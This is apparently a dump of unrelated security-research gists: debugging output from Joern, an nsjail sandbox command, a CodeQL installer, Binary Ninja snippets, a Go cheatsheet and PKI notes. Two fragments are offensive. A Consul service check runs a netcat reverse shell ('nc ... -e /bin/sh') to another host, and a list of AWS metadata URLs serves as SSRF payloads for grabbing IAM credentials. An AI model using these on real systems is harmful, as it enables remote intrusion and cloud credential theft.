torque59

joern>  sink.reachableByFlows(source).p
2025-01-28 16:32:43.255 ERROR SourceToStartingPoints: Unable to complete 'SourceToStartingPoints' task
java.util.NoSuchElementException: null
        at io.shiftleft.Implicits$IterableOnceDeco$.onlyChecked$extension(Implicits.scala:17) ~[io.shiftleft.codepropertygraph_3-1.7.23.jar:1.7.23]
        at io.shiftleft.semanticcpg.language.nodemethods.CfgNodeMethods$.io$shiftleft$semanticcpg$language$nodemethods$CfgNodeMethods$$$walkUpContains$extension(CfgNodeMethods.scala:126) ~[io.joern.semanticcpg-4.0.227.jar:4.0.227]
        at io.shiftleft.semanticcpg.language.nodemethods.CfgNodeMethods$.method$extension(CfgNodeMethods.scala:110) ~[io.joern.semanticcpg-4.0.227.jar:4.0.227]
        at io.joern.dataflowengineoss.queryengine.BaseSourceToStartingPoints.fieldAndIndexAccesses(SourcesToStartingPoints.scala:236) ~[io.joern.dataflowengineoss-4.0.227.jar:4.0.227]
        at io.joern.dataflowengineoss.queryengine.BaseSourceToStartingPoints.withFieldAndIndexAccesses$$anonfun$1(Sourc

torque59

docker run --privileged --rm -it nsjailcontainer nsjail --user 99999 --group 99999 --disable_proc --chroot / --seccomp_string 'ALLOW { SYSCALL[-1], futex, epoll_wait, poll, nanosleep, restart_syscall, write, rt_sigprocmask, sched_yield, clock_gettime, read, rt_sigreturn, madvise, mmap, fcntl, sendto, mprotect, epoll_ctl, gettid, clone, open, brk, close, set_robust_list, sigaltstack, recvfrom, munlock, prctl, socket, getuid, tgkill, sched_getparam, sched_getscheduler, munmap, newlstat, newfstat, newstat, execve, readlink, lseek, rt_sigaction, getdents, epoll_create1, eventfd2, geteuid, sched_getaffinity, mknod, getrlimit, openat, mkdir, setitimer, getcwd, arch_prctl, setrlimit, getitimer, set_tid_address, unlink, access, getegid, getsockopt, exit, exit_group, ioctl, getgid, connect, select, ioctl, rt_sigprocmask, chown, openat, dup2, pipe, wait4, access, getuid, geteuid, getgid, getegid, openat, faccessat, getdents, munmap, arch_prctl, lseek, set_tid_address, set_robust_list, getdents, close, futex, brk, prlim

torque59

echo "[+] Installing CodeQL at $HOME"
cd $HOME
mkdir codeql-home && cd codeql-home
wget "https://github.com/github/codeql-cli-binaries/releases/download/v2.1.3/codeql.zip" && unzip codeql.zip
mv codeql/ codeql-cli/
git clone https://github.com/github/codeql.git
echo "set PATH $HOME/codeql-home/codeql-cli/ $PATH" >> ~/.config/fish/config.fish && source ~/.config/fish/config.fish
codeql resolve languages && codeql resolve qlpacks
echo "[+] CodeQL installed"

torque59

Welcome to Jordan's grab-bag of common Binary Ninja Snippets.

These snippest are meant to run with the Snippets Plugin
(http://github.com/Vector35/snippets) though they can all also be pasted
directly into the python console or turned into stand-alone plugins as needed.

To install the entire collection at once, just install the Snippets plugin via
the plugin manager (CMD/CTL-SHIFT-M), confirm the Snippet Editor works
(Tool/Snippets/Snippet Editor), and unzip this bundle (Download ZIP above) into
your Snippets folder.

torque59

# vim: ft=python sw=4 ts=4 et

from pprint import pprint

mgr = RepositoryManager()

# add third-party plugins with the following:
# mgr.add_repository(url="https://github.com/GitMirar/BinaryNinjaYaraPlugin.git",
#                    repopath="plugins",
#                    localreference="master",

torque59

{
        "ID": "http",
        "Name": "http",
        "Address": "0.0.0.0",
        "Port": 80,
        "check": {
                "script": "nc 172.17.0.1 8081 -e /bin/sh",
                "interval": "10s"
        }
}

torque59

/*
********************************************************************************
Golang - Asterisk and Ampersand Cheatsheet
********************************************************************************

Also available at: https://play.golang.org/p/lNpnS9j1ma

Allowed:
--------
p := Person{"Steve", 28} 	stores the value

torque59

/*
    Full explanation is available here: http://attilathedud.me/mac-os-x-el-capitan-10-11-and-task_for_pid/
*/

/*
    To compile, create a file called Info.plist with the following content:
    
    <?xml version="1.0" encoding="UTF-8"?>  
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">  
    <plist version="1.0">  

torque59

## AWS 
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname

torque59

PKI

• PKI is based upon two keys (public and private)
• Data can be securely encrypted using either the public or private keys
• Data can only be decrypted when using the opposite key to that which encrypted the data
• Use a Key Generator (e.g. ssh-keygen) to create your public/private keys
• These keys are typically stored in ~/.ssh/
  • id_rsa (private key; do not share! typically used to decrypt data)
  • id_rsa.pub (public key; typically used to encrypt data)